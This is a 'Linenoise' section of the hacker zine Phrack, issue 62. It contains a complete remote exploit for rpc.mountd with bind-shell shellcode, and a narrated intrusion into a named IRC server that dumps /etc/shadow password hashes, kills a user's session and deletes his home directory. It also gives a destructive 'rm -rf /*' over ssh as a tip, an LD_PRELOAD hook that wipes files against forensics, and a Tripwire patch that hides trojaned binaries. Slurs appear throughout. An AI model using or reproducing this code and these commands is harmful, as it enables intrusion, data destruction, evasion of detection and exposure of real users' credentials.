==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x0f |=-----------------------=[ L I N E N O I S E ]=-------------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ Phrack Staff ]=----------------------------=| --[ Contents 1 - A Phrack Editorial Correction 2 - A Phrack Editorial Correction Part II 3 - Getting the rm -rf d0wn p@ 4 - This is What Happens When You Talk Shit 5 - Keeping 0day Safe 6 - Tripwire is Silly 7 - Evil Shellcode Developments 8 - Really Dangerous Cisco Shit Released 9 - The Defcon Review 10 - pr0ix IRC Medley 11 - Project Honeynet Enumeration 12 - Sebek Sucks 13 - Bluebox Infoz |=[ 0x01 ]=--------------------------------------------------------------=| A Phrack Editorial Correction by an apologetic phr4ck-st4ff Phrack would like to apologize for a misprint in our phrack 61 edition! Apparently the table of contents read as such: "Polymorphic Shellcode Engine (.txt) 3 gay d00dz" This should be amended to say "4 gay d00dz" as there were four authors: theo detristan theo@ringletwins.com tyll ulenspiegel tyllulenspiegel@altern.org yann_malcom yannmalcom@altern.org mynheer superbus von underduk msvu@ringletwins.com Our wonderful phrack authors were very upset by this misprint, and we would like to say sorry for neglecting any of our gay gay dungeons+dragonz playing friends. |=[ 0x02 ]=--------------------------------------------------------------=| A Phrack Editorial Correction Part II by an apologetic phr4ck-st4ff O'Reilly is suing phrack magazine for plagiarism! Apparently Hijacking Linux Page Fault Handler (.txt) by "buffer" was ripped directly from the O'Reilly's Understanding the Linux Kernel series, practically word-for-word. Stand by and join hands while phrack staff laughs, since phrack isn't subject to copyright laws. In fact, phrack isn't subject to any human laws! |=[ 0x03 ]=--------------------------------------------------------------=| Getting the rm -rf d0wn p@ by Kar3l3ss k4rl the other day some faggot on efnet was talking shit 2 me so i decided to take him out. i fired up kontr0l p4n3l | stored user names and passwords i did a whois on irc to find his host name, found the box in my big list, and then i issued something like the following on my shell: ssh -lroot blah.com "rm -rf /*" & and i left the process in the background to do it magic, assuming it would disconnect me when the computer was obliter8d. imagine my surpr1ze when my target continued talking shit on irc a few minutes later.apparently, some variantz where rm is aliased to 'rm -i' prevent rm -rf madness! thus my stealthy hard drive removal failed! the "rm -i" alias stopping attacks is a very real threat! our solution was swift and simple: always be sure to issue the following command: yes | ssh -lroot blah.com "rm -rf /*" & |=[ 0x04 ]=--------------------------------------------------------------=| This is What Happens When You Talk Shit by the b1g leb0wsk1 2nd Sept 2003 - pr0ix wages war on #phrack greets pr0ix greets dvd you gonna give phrack hell? yeah cool fuck then rad up stargliders.org/phrack/opencult/ add a few ./s for me "{ they are toooooooooo gay :P even --- a bit later --- im guessing SLY packet kid is you? lets DDDOS them HAA open a nice bgp --- After the clear threat of DDoS from the self-proclaimed "Prince of packets" pr0ix, #phrack strikes back... .----------------------------------------- -- - | pr0ix (pr0ix@apollo.hack.co.za) (South Africa) : ircname : no justice - no peace | server : irc.servercentral.net (chase the dragon) -:- BitchX: Checking tables... -:- BitchX: nslookup of pr0ix!pr0ix@apollo.hack.co.za failed. Hmmm... pr0ix thinks his spoof can protect him but thanks to an anonymous supporter, -gaypr0ix(d0rknet@i.hate.pr0ix)- pr0ix is on irc.scservers.com. evil:~# host irc.scservers.com irc.scservers.com A 64.202.97.154 evil:~# Ok, lets see if our unpublished 0dayz will work? :PpPPpPPpPPPpPpPpPp evil:~# nc irc.scservers.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 05 Sep 2003 16:25:37 GMT Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) Lets go... evil:~# ./a.out -v64.202.97.154 -p80 -o12 -t6 Attacking 64.202.97.154:80 - Apache 1.3.27 progress[#######] Linux irc.scservers.com 2.4.1-008stab043.15.swsoft-smp #1 SMP Thu Mar 20 16:47:30 MSK 2003 i686 unknown uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin) id pr0ix uid=512(pr0ix) gid=512(pr0ix) groups=512(pr0ix) #hohoho time for more skillz whereis suexec suexec: /usr/sbin/suexec /usr/share/man/man8/suexec.8.gz ls -al /usr/sbin/suexec -r-s--x--- 1 root apache 11732 May 15 06:09 /usr/sbin/suexec cat << EOF >> suexp.c /* REMOVED - sorry kids * Phrack supports Non-disclosure */ EOF make suexp cc suexp.c -o suexp ./suexp -t6 id uid=0(root) gid=0(apache) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) #h3h3h3 ps ax | grep pr0ix 29004 pts/0 S 0:21 BitchX pr0ix irc.servercentral.net 7200 pts/6 S 0:00 grep pr0ix ls -al ~pr0ix total 26731 drwx------ 6 pr0ix pr0ix 2048 Sep 5 08:26 . drwxr-xr-x 37 root root 1024 Aug 26 08:47 .. -rw-rw-r-- 1 pr0ix pr0ix 5 Jan 10 2003 1 -rw-r--r-- 1 pr0ix pr0ix 5261404 Jan 16 2003 8310mcu554.zip -rw-r--r-- 1 pr0ix pr0ix 3975 Sep 5 03:15 ao.tgz -rw------- 1 pr0ix pr0ix 13253 Sep 5 08:26 .bash_history -rw-rw-r-- 1 pr0ix pr0ix 144847 Dec 26 2002 .bash_history.save -rw-r--r-- 1 pr0ix pr0ix 24 Oct 7 2002 .bash_logout -rw-r--r-- 1 pr0ix pr0ix 244 Oct 7 2002 .bash_profile -rw-r--r-- 1 pr0ix pr0ix 124 Oct 7 2002 .bashrc drwx------ 4 pr0ix pr0ix 1024 Aug 29 06:15 .BitchX -rw-rw-r-- 1 pr0ix pr0ix 36 Jul 29 02:36 .bitchxrc -rw-r--r-- 1 pr0ix pr0ix 80687 Aug 5 09:19 blah2.jpg -rw-r--r-- 1 pr0ix pr0ix 61861 Aug 6 11:47 blah.jpg -rw-r--r-- 1 pr0ix pr0ix 816279 Jan 16 2003 b.zip -rw-r--r-- 1 pr0ix pr0ix 441952 Aug 11 09:13 CANVAS3_VivianLi.rar -rw-r--r-- 1 pr0ix pr0ix 2353357 Aug 6 11:48 cv4.zip -rw-r--r-- 1 pr0ix pr0ix 15836 Aug 5 08:49 dcom.c -rw-r--r-- 1 pr0ix pr0ix 15836 Aug 5 08:53 dcom-cygwin-harq.c -rw-r--r-- 1 pr0ix pr0ix 14336 Aug 5 08:53 dcom-cygwin-harq.exe -rw-r--r-- 1 pr0ix pr0ix 18983 Aug 5 09:18 dcom-liunx-harq -rw-r--r-- 1 pr0ix pr0ix 14822 Aug 5 09:18 dcom-liunx-harq.c -rw-rw-r-- 1 pr0ix pr0ix 487 Jun 7 2002 FILE_ID.DIZ -rw-rw-r-- 1 pr0ix pr0ix 2621 Jul 25 10:17 heh -rw-r--r-- 1 pr0ix pr0ix 4070 Aug 11 09:08 mircexploit-v6.03.c drwxr-xr-x 2 pr0ix pr0ix 1024 Jan 10 2003 .ncftp -rw-rw-r-- 1 pr0ix pr0ix 1356 Mar 13 2000 new.c -rw-rw-r-- 1 pr0ix pr0ix 286795 Jun 7 2002 NOKIA_8310_SERVICE_BULLETIN_v1_0-ROYAL.rar -rw-r--r-- 1 pr0ix pr0ix 12058 Jul 23 02:24 opcode.exe -rw-rw-r-- 1 pr0ix pr0ix 825624 Jan 10 2003 Picture 001.jpg drwxr-xr-x 2 pr0ix pr0ix 1024 Jan 16 2003 public_html -rw-r--r-- 1 pr0ix pr0ix 794624 Aug 6 08:33 RetinaRPCDCOM.exe -rw-r--r-- 1 pr0ix pr0ix 290419 Jan 16 2003 rn8310sb.zip -rw-rw-r-- 1 pr0ix pr0ix 12945 Jan 9 2003 root.c -rw-rw-r-- 1 pr0ix pr0ix 15681 Jun 8 2002 ROYAL.NFO -rw-r--r-- 1 pr0ix pr0ix 22317 Aug 4 14:52 rpc-int.exe -rw-r--r-- 1 pr0ix pr0ix 16384 Aug 6 10:15 rpctest-1026.exe -rw-r--r-- 1 pr0ix pr0ix 16384 Aug 6 08:28 rpctest.exe -rw-r--r-- 1 pr0ix pr0ix 11712 Aug 6 08:28 rpctest.rar -rw-r--r-- 1 pr0ix pr0ix 12834 Apr 19 05:48 sormount.c drwx------ 2 pr0ix pr0ix 1024 Sep 1 07:23 .ssh -rw-rw-r-- 1 pr0ix pr0ix 15384575 Aug 5 05:31 synlog1 -rw-r--r-- 1 pr0ix pr0ix 349 Apr 21 13:41 targets -rw-r--r-- 1 pr0ix pr0ix 15305 Aug 4 14:42 universal.c.txt -rw-r--r-- 1 pr0ix pr0ix 0 Aug 20 04:39 upload.html -rwxrwxr-x 1 pr0ix pr0ix 112 May 14 2002 vhosts.sh -rw------- 1 pr0ix pr0ix 1778 Aug 26 04:33 .viminfo -rw-r--r-- 1 pr0ix pr0ix 17025 Jul 31 02:47 win32dcom.cpp -rw-r--r-- 1 pr0ix pr0ix 159802 Aug 11 02:21 win32dcom.exe -rw-rw-r-- 1 pr0ix pr0ix 85136 Aug 30 18:04 zasta.JPG -rw-r--r-- 1 pr0ix pr0ix 10240 Oct 14 2002 zones.tar #HmMmmMMMmmMMm... pr0ix needs to get more codes for us :(((( #At phrack we like to give something back to our supporterz cat sormount.c /* * remote exploit for rpc.mountd (nfs-utils <= 1.0.3) * by sorbo (sorbox@yahoo.com) * http://www.darkircop.org * * The problem lies in xlog() where the following code exists: * if ((n = strlen(buff)) > 0 && buff[n-1] != '\n') { * buff[n++] = '\n'; buff[n++] = '\0'; * } * * a NULL byte will overflow buff, thus overwriting the LSB of the frame pointer. * * We do not control the area pointed by the new frame pointer, but we do control the area * of &hp (in auth_authenticate()), thus we can overwrite hp and make it point to an area we like. * hp will get free()d so we can make it point to our fake chunk which can overwrite ebp+4, which * is the area ret will look for its return address (when ebp is copied to stack pointer and the * ret is popped when leaving auth_authenticate()). * * Have fun * * Greetz: gunzip@ircnet * */ #include #include #include #include #include #include #include char shellcode[] = /* port bind tcp/30464 ***/ /* jump 10 */ "\xeb\x0a" /* overwritten bit */ "neveznevez" /* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */ "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xd2" // xorl %edx,%edx "\xb0\x66" // movb $0x66,%al "\xb3\x01" // movb $0x1,%bl "\x51" // pushl %ecx "\xb1\x06" // movb $0x6,%cl "\x51" // pushl %ecx "\xb1\x01" // movb $0x1,%cl "\x51" // pushl %ecx "\xb1\x02" // movb $0x2,%cl "\x51" // pushl %ecx "\x8d\x0c\x24" // leal (%esp),%ecx "\xcd\x80" // int $0x80 /* port is 30464 !!! */ /* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */ "\xb3\x02" // movb $0x2,%bl "\xb1\x02" // movb $0x2,%cl "\x31\xc9" // xorl %ecx,%ecx "\x51" // pushl %ecx "\x51" // pushl %ecx "\x51" // pushl %ecx /* port = 0x77, change if needed */ "\x80\xc1\x77" // addb $0x77,%cl "\x66\x51" // pushl %cx "\xb1\x02" // movb $0x2,%cl "\x66\x51" // pushw %cx "\x8d\x0c\x24" // leal (%esp),%ecx "\xb2\x10" // movb $0x10,%dl "\x52" // pushl %edx "\x51" // pushl %ecx "\x50" // pushl %eax "\x8d\x0c\x24" // leal (%esp),%ecx "\x89\xc2" // movl %eax,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* listen(fd, 1) */ "\xb3\x01" // movb $0x1,%bl "\x53" // pushl %ebx "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x66" // movb $0x66,%al "\x80\xc3\x03" // addb $0x3,%bl "\xcd\x80" // int $0x80 /* cli = accept(fd, 0, 0) */ "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x50" // pushl %eax "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\xb3\x05" // movl $0x5,%bl "\xb0\x66" // movl $0x66,%al "\xcd\x80" // int $0x80 /* dup2(cli, 0) */ "\x89\xc3" // movl %eax,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 /* dup2(cli, 1) */ "\x41" // inc %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movl $0x3f,%al "\xcd\x80" // int $0x80 /* dup2(cli, 2) */ "\x41" // inc %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 /* execve("//bin/sh", ["//bin/sh", NULL], NULL); */ "\x31\xdb" // xorl %ebx,%ebx "\x53" // pushl %ebx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x8d\x54\x24\x08" // leal 0x8(%esp),%edx "\x31\xc9" // xorl %ecx,%ecx "\x51" // pushl %ecx "\x53" // pushl %ebx "\x8d\x0c\x24" // leal (%esp),%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 /* exit(%ebx) */ "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80"; // int $0x80 /* OK here are the instructions to get offsets: * align: * gdb /usr/sbin/rpc.mountd * press c * run ./exploit -t 1 -a 0 -v 127.0.0.1 * it will segfault and do info r edx * repeats steps (incrementing align untill edx = 0x4141414e * * ebp: * gdb, press c, run exploit, it will seg, type up, and info r ebp * it should end with 00.. that is ur ebp * * path: * gdb, press c, run exploit, it will seg * type maintenance info sections, and get end of .bss section (where heap starts) * do something like x/100000bx 0x08058ce4 where is end of .bss * press enter untill you find a bunch of 0x41 * look for 0x2f 0x41 0x41 0x41 * 0x2f == '/' which is the start of path. The address of 0x2f is the address of path * */ struct target_info { char *desc; /* description */ int align; /* will be 0,1,2,3 */ int ebp; /* what ebp will look like once overwritten */ int path; /* address of path variable on heap */ }; struct target_info targets[] = { { "Slackware 8.1",3,0xbfffe000,0x805d17c }, { "Slackware 8.0",2,0xbfffe100,0x805d7bc }, { "Debug (gdb)",0,0xbfffe100,0x41414142 } }; #define TIMEOUT 5 /* timeout for rpc request in seconds */ bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) { return xdr_string(xdrs, objp, MNTPATHLEN); } /* try to connect to the shell */ void ride(char *ip) { fd_set rfds; int rd; int s; struct sockaddr_in s_in; char buff[1024]; s_in.sin_port = htons(30464); s_in.sin_family = PF_INET; s_in.sin_addr.s_addr = inet_addr(ip); s = socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); if(s < 0) { perror("socket()"); exit(-1); } if(connect(s,(struct sockaddr *)&s_in,sizeof(s_in)) < 0) { close(s); return; /* failed */ } /* successs */ send(s,"id;\n",4,0); while(1) { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(s, &rfds); if(select(s+1, &rfds, NULL, NULL, NULL) < 1) exit(0); if(FD_ISSET(0,&rfds)) { if( (rd = read(0,buff,sizeof(buff))) < 1) exit(0); if( send(s,buff,rd,0) != rd) exit(0); } if(FD_ISSET(s,&rfds)) { if( (rd = recv(s,buff,sizeof(buff),0)) < 1) exit(0); write(1,buff,rd); } } } void exploit(struct target_info target, char *ip) { char egg[1024]; dirpath eggd; int *ptr; CLIENT *client; int s; struct sockaddr_in s_in; struct timeval tv; char chunk[] = "\xfc\xff\xff\xff" /* prevsize */ "\xfc\xff\xff\xff" /* size */ "\xa1\xff\xff\xbf" /* junk */ "\xa1\xff\xff\xbf" /* bk */ "\xa1\xff\xff\xbf"; /* fd */ /* initial set up note it must start with / */ memset(egg,'A',sizeof(egg)); egg[sizeof(egg)-1] = 0; egg[0] = '/'; /* fill up with address of our fake chunk */ printf("Address of fake chunk= 0x%x\n",target.path+4+8); for(ptr = (int*)((char*)egg+target.align+300);ptr < (int*)&egg[sizeof(egg)-6]; ptr++) *ptr = target.path+4+8; /* addr of fake chunk */ /* setup our chunk and copy it in egg */ ptr = (int*)((char*)chunk+12); /* bk */ printf("Addr of ret= 0x%x\n",target.ebp+4); *ptr = target.ebp+4-12; /* addr of ret-12 */ ptr++; /* fd */ printf("Addr of shellcode= 0x%x\n",target.path+40); *ptr = target.path+40; /* addr of shellcode */ memcpy(egg+4,chunk,strlen(chunk)); /* copy our shellcode */ memcpy(egg+40,shellcode,strlen(shellcode)); eggd = &egg[0]; /* connect to mountd and send request */ s = RPC_ANYSOCK; s_in.sin_family = PF_INET; s_in.sin_port = 0; if(!inet_aton(ip,&s_in.sin_addr)) { printf("Invalid ip %s\n",ip); exit(-1); } client = clnttcp_create(&s_in,MOUNTPROG, MOUNTVERS, &s, 0, 0); if(!client) { clnt_pcreateerror("clnttcp_create"); exit(-1); } client->cl_auth = authunix_create_default(); tv.tv_usec = 0; tv.tv_sec = TIMEOUT; if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath, (void *)&eggd,(xdrproc_t) xdr_void, NULL,tv) == RPC_SUCCESS) { printf("Server managed to mount our path... something went wrong\n"); exit(-1); } printf("Exploitation done... attempting to connect to shell\n"); ride(ip); printf("Failed...\n"); } void print_targets() { int tcount = sizeof(targets)/sizeof(struct target_info); int i; printf("Id\tDescription\talign\t\tpath\t\tebp\n"); for(i = 0; i < tcount; i++) { printf("%d)\t%s\t%d\t\t0x%x\t0x%x\n",i, targets[i].desc,targets[i].align,targets[i].path,targets[i].ebp); } } void usage(char *p) { printf("Usage: %s \n",p); printf("-t\t\ttarget\n"); printf("-a\t\talign\n"); printf("-p\t\tpath\n"); printf("-e\t\tebp\n"); printf("-v\t\tvictim ip\n"); printf("\n"); print_targets(); exit(0); } int main(int argc, char *argv[]) { int opt; int t = -1; int align = -1; int path = -1; int ebp = -1; char ip[16]; ip[0] = 0; printf("rpc.mountd (nfs-utils <= 1.0.3) remote exploit by sorbo (sorbox@yahoo.com)\n"); while( (opt = getopt(argc,argv,"t:a:hp:e:v:")) != -1) { switch(opt) { case 't': t = atoi(optarg); if(t >= sizeof(targets)/sizeof(struct target_info)) { printf("Invalid target %d\n",t); exit(-1); } break; case 'a': align = atoi(optarg); break; case 'p': if(sscanf(optarg,"%x",&path) != 1) { printf("Invalid path addr\n"); exit(-1); } break; case 'e': if(sscanf(optarg,"%x",&ebp) != 1) { printf("Invalid ebp addr\n"); exit(-1); } break; case 'v': snprintf(ip,sizeof(ip),"%s",optarg); break; case 'h': default: usage(argv[0]); } } if(t < 0) { printf("Select target\n"); usage(argv[0]); } if(strlen(ip) == 0) { printf("Select victim\n"); usage(argv[0]); } if(align != -1) targets[t].align = align; if(path != -1) targets[t].path = path; if(ebp != -1) targets[t].ebp = ebp; printf("Attacking target %s\n",targets[t].desc); printf("Align= %d\n",targets[t].align); exploit(targets[t],ip); exit(0); } #WOW thanks phrack!!! cat /etc/shadow root:$1$ZJShZBLX$SjDHIWcpO/GA9Dipkod781:11944:0:99999:7::: bin:*:11915:0:99999:7::: daemon:*:11915:0:99999:7::: adm:*:11915:0:99999:7::: lp:*:11915:0:99999:7::: sync:*:11915:0:99999:7::: shutdown:*:11915:0:99999:7::: halt:*:11915:0:99999:7::: mail:*:11915:0:99999:7::: news:*:11915:0:99999:7::: uucp:*:11915:0:99999:7::: operator:*:11915:0:99999:7::: games:*:11915:0:99999:7::: gopher:*:11915:0:99999:7::: ftp:*:11915:0:99999:7::: nobody:*:11915:0:99999:7::: pcap:!!:11915:0:99999:7::: apache:!!:11915:0:99999:7::: mailnull:!!:11915:0:99999:7::: popa3d:!!:11915:0:99999:7::: rpm:!!:11915:0:99999:7::: named:!!:11915:0:99999:7::: rpc:!!:11915:0:99999:7::: webadmin:!!:12212:0:99999:7::: irc:$1$isxQjOdP$6jb3AzTc80L7x3WcCAOF./:12212:0:99999:7::: ibot:$1$ej3zbkRi$AAY8Xl8Nu9HEJMiNEYvsa/:12212:0:99999:7::: seiki:$1$l05gX/8m$4I1ILj8n63UameQ5xjTU5/:12212:0:99999:7::: ara:$1$144rrypI$0lHwNZWRhzJaM4Z.orByK.:12212:0:99999:7::: darwin:$1$aSsbmEs.$ORLOh7BSFRp44vSpBabwb.:12212:0:99999:7::: munky:$1$EZOznsYZ$nf1E5sJzcHcRcEHf/zRii1:12212:0:99999:7::: matthew:$1$LE26nN17$eCfcerAHraiBDREoby7lL1:12212:0:99999:7::: phelix:$1$4fctwQLD$VNx6x3XEL.FfdbrHUpTBP1:12212:0:99999:7::: hardy:$1$Fd/NGh3W$GCBjp4D1HQ0H6s9rvueNW/:12212:0:99999:7::: ident:!!:11942:0:99999:7::: pr0ix:$1$QE94tcwZ$8jAQqYM4/41TfcguVlvl31:12212:0:99999:7::: jordan:$1$1off0go6$o29r4O/06IePxER/C67m40:12212:0:99999:7::: woohah:$1$TWHQOOsM$zKOKWiUg3xwjyJW.hqVh0.:12212:0:99999:7::: guard:$1$YPOKEA.N$vpINblI9rcqiLSVKwuoF1/:12212:0:99999:7::: ben:$1$r2m9RMMt$VvMTQP48gzw0ea3oynpwn0:12212:0:99999:7::: josh:$1$zUB76ytF$nrYsM.IJQ38k0l.Exj8Oh1:12212:0:99999:7::: mailbox:$1$iAoBTdPK$5jBYGN7NkFEDBPeS.6xJY.:12212:0:99999:7::: mark:$1$gaxorDr9$HEB0PaTuiRCfy6u9q9nwM/:12212:0:99999:7::: jsw:$1$VvRVH/ZW$GTszjvXK2d/.hPSayft2G/:12212:0:99999:7::: syn:$1$PYXWwsBF$A27F8XhxA29FdBCGGCEla.:12212:0:99999:7::: oiad:$1$2h6x6zGz$F/OtF1.cnoLfIx3fiUVir1:12212:0:99999:7::: rachel:$1$mWtUDk29$dXrVKWOFGgtOyE1ErJjrm/:12212:0:99999:7::: douglas:$1$po/d7cUE$v2m0yNiWJoLY2w0i3chZ11:12212:0:99999:7::: bluerose:$1$HP0fEesQ$5BV0EWfWa9lMXlubq5NcL1:12212:0:99999:7::: scott:$1$p9J5H0Nw$lTYLtwHboZAu/2k/RFDma1:12212:0:99999:7::: vcsa:!!:12158:0:99999:7::: copy:$1$Wvnt5j6M$BxW6elYpZpafw4krGu2HC/:12212:0:99999:7::: cco:$1$DDCKlJdm$KHb.YwvehZQYaxCcvS2cM0:12212:0:99999:7::: love:!!:12212:0:99999:7::: john:$1$CDXsm4w2$xiMBwHTGl7IYtyGfmbosH/:12227:0:99999:7::: jason:$1$QQl/aoQJ$wGoavhKLO7HsBsdRgmAA3/:12212:0:99999:7::: sojobo:$1$ewLrMMqk$lfq1IMngSrJxjDfC8pAvO0:12215:0:99999:7::: fpod:$1$27XuryQQ$3Wk/f9yoQthayOqNB0RnR0:12277:0:99999:7::: asr:$1$VDZ6Xwti$/FRsuaNxU64rBVaeVP3x8/:12278:0:99999:7::: mjp:$1$W3bmCP6X$ov1/Qm2FpS.mjdgioDh4e1:12290:0:99999:7::: #cool! our old friend seiki ;PpPPPpPPpPPppPP ps ax | grep pr0ix 29004 pts/0 S 0:21 BitchX pr0ix irc.servercentral.net 28828 pts/6 S 0:00 grep pr0ix kill -9 29004 -:- SignOff pr0ix: #darknet (EOF from client) # bye bye pr0ix :( w 12:16pm up 148 days, 21:00, 10 users, load average: 0.00, 0.00, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pr0ix pts/0 reptile.cube11.n Mon 9am 2:15m 30.11s 8.80s scr-bx mjp pts/2 ool-18b92e85.dyn 8:11am 3:23 0.11s 0.07s screen -r mjp pts/3 - 8:11am 4:04m 0.11s 0.11s /bin/bash munky pts/5 - 6:51am 2:28m 8:00 8:00 BitchX seiki pts/11 - 10:35am 18:41 2:53 2:53 irssi ara pts/4 - Tue 8am 25:12m 2:04 2:04 BitchX irc.servercentral.net munky pts/13 207.91.250.66 6:51am 2:28m 0.10s 0.03s screen -r ara pts/16 209-102-214-3.ip Tue 8am 25:12m 1.10s 1.04s screen -r seiki pts/18 user-0cceoih.cab 10:27am 18:41 0.11s 0.05s screen -dr mjp pts/20 - 8:11am 3:23 18.70s 18.70s ssh #ok, im bored now... rm'in time!!!! rm -rf ~pr0ix ls -ald ~pr0ix ls: ~pr0ix: No such file or directory mkdir /home/pr0ix chown pr0ix.pr0ix /home/pr0ix cd /home/pr0ix touch PHRACK_OWNS_J00 # Phrack 8==================D ~~~~~~~~~ pr0ix ^C evil:~# ~pr0ix COMING SOON !!! |=[ 0x05 ]=--------------------------------------------------------------=| Keeping 0day safe by anonymous /* * Apparently honeynet has new ideas of how to steal your warez! * They're more sophisticated than ever! * Not just to be confined to HD MOORE sitting alone in a room, reading * full tcpdump logs (like shimomura) and piecing together the exploits into * his elite perl scripts for metadata. * * Now, the strategy is to let lamers compile exploits on owned boxes, and * copy them over into safe storage when unlink() is called.... for example, * temporary gcc assembly and preprocessor files will be backed up, leaving * your original code for lance spitzner to sed /s/.. your name out of the * headers, replace your name with his, sell it to iDEFENSE, and hail it as * another victory for project honeynet. * * No more! Compile this and LD_PRELOAD or LD_LIBRARY_PATH it before whatever * you do. Yea I know this code is lame, but if it prevents 0day from getting * lost than it was probably worth the 5 minutes. * * gcc -Wall -fpic -c pre_unlink.c * ld -Bshareable -o pre_unlink.so pre_unlink.o * and change "LIBC_PATH" to the path of libc on your system */ #include #include #include #include #include #include #include #define DEBUG 1 #define LIBC_PATH "/usr/lib/libc.so.12" #define RANDOM_PATH "/dev/urandom" #define BLOCK_SIZE 4096 int (*xunlink) (const char *); int unlink (const char *path); void get_random_data (int fd, unsigned int len); /* uh oh this function doesn't comply with the 52 pass secure dod wipe, so i'm sure michael zalewski or dvdman will publish an advisory soon but who karez cuz everybody knowz electron micr0sk0pez r used 4 microbiology not forensix */ void get_random_data (int fd, unsigned int len) { static int is_open = 0; static int randfd; char buf[BLOCK_SIZE]; if (!is_open) { randfd = open (RANDOM_PATH, O_RDONLY); if (randfd < 0) { perror ("open"); fprintf (stderr, "Error opening random data file: %s\n", RANDOM_PATH); exit (EXIT_FAILURE); } is_open = 1; } memset (buf, 0x41, sizeof (buf)); if (read (randfd, buf, len) != len) { perror ("read"); fprintf (stderr, "Error fetching random data!\n"); exit (EXIT_FAILURE); } if (write (fd, buf, len) != len) { perror ("write"); fprintf (stderr, "Error writing random data!\n"); exit (EXIT_FAILURE); } return; } int unlink (const char *path) { struct stat sb; int fd, result; unsigned int i; #ifdef DEBUG fprintf (stderr, "unlink(%s) ...\n", path); #endif if (stat (path, &sb) < 0) { perror ("stat"); fprintf (stderr, "unlink() on %s: unable to stat this file.\n", path); if (errno == ENOENT) goto do_unlink; exit (EXIT_FAILURE); } if ((fd = open (path, O_RDWR)) < 0) { perror ("open"); fprintf (stderr, "unlink() on %s: unable to open this file for writing.\n", path); if (errno == ENOENT) goto do_unlink; exit (EXIT_FAILURE); } for (i = 0; i < sb.st_size; ) { unsigned int to_write; /* wowow optimized! tanenbaum would be proud! */ if ((sb.st_size - i) >= BLOCK_SIZE) to_write = BLOCK_SIZE; else to_write = (sb.st_size - i); get_random_data (fd, to_write); i += to_write; } close (fd); do_unlink: result = xunlink (path); return result; } void _init () { void *handle; handle = dlopen (LIBC_PATH, RTLD_LAZY); if (handle == NULL) { fprintf (stderr, "Error preloading library: %s\n", dlerror ()); exit (EXIT_FAILURE); } if ((xunlink = dlsym (handle, "unlink")) == NULL) { fprintf (stderr, "Error hijacking unlink(): %s\n", dlerror ()); exit (EXIT_FAILURE); } return; } |=[ 0x06 ]=--------------------------------------------------------------=| Tripwire is Silly by The Blackhat Moriaty Over recent years we have seen admins faced with a deluge of rootkits, such as the infamous Linux Root Kit. This ingeniously and originally named tool replaces system binaries such netstat, ls, ps and top! When an admin searches for haxor files or unauthorized network connections he sees only what the hacker wants him to see..... everywhere admins are in fear and confusion. Until one day, out of the flames and panic comes... Tripwire, inc! With their flashy new HIDS (yes guys, Hostbased Intrustion Detection System) they promised to save the world from modified files. A lot of time and effort went into making tripwire secure. You need not one, but two passwords to modify tripwire's database, as it itself is heavily encrypted to prevent tampering. In response to this, infamous hackers such as Optyx of team Uberh4x0r created a series of steadily worsening kernel-based rootkits such as KIS (Keep It Superflous). Now, unfortunately, the days of kernel-based rootkits are long gone. Although a lot of hackers haven't quite caught up with this fact yet, RedHat (*the* #1 Linux perveyor) now ship a kernel that doesn't export the symbol for sys_call_table! Oh gno! Once again, it looks as if Tripwire, inc has found it's niche in the information security paradigm. Without kernel level support how are we ever gonna be able to keep a trojan on a box! (At the moment maybe some people are sitting there saying "What, do you mean it's not Ok just to match the size/timstamp?", and I urge these people to just put the keyboard down and walk away.) Well, I have spent many hours searching the source code of tripwire looking for tricks to get around this big problem. Tripwire, Inc, have taken a lot of time to make their source code hard to audit, and the infamous Object Orientated Bloatware approach has been used to make any audit as unpleasant as possible. However, after several hours work I cam up with the following solution: Just replace the Compare method in src/fco/fcoompare.cpp with the one below! It's a pretty small file, and anyway patch is hard. You know you're probably better off sticking to cun 'n' paste in notepad! Just add new elements to the hidden array for every file you don't want tripwire to check! Just do a 'make release' and copy the tripwire binary over the top of the old one - remember to strip the binary and to match size and timestamp!@ ---[CUT HERE YOU MORON]--------------------------------%<-------------------------------------------------- /////////////////////////////////////////////////////////////////////////////// // Compare /////////////////////////////////////////////////////////////////////////////// uint32 cFCOCompare::Compare(const iFCO* pFco1, const iFCO* pFco2) { int i= 0; char *hidden[] = { "/usr/sbin/sshd", "/usr/sbin/tripwire", 0}; ASSERT(pFco1 != 0); ASSERT(pFco2 != 0); // first, make sure the fcos are of the same type... if(pFco1->GetType() != pFco2->GetType()) { ASSERT( false ); INTERNAL_ERROR( "fcocompare.cpp" ); } /* hohoho letz be kradicle */ while(hidden[i]) { if(strcmp(pFco1->GetName().AsString().c_str(), hidden[i]) == 0) { return EQUAL; } } const iFCOPropSet* ps1 = pFco1->GetPropSet(); const iFCOPropSet* ps2 = 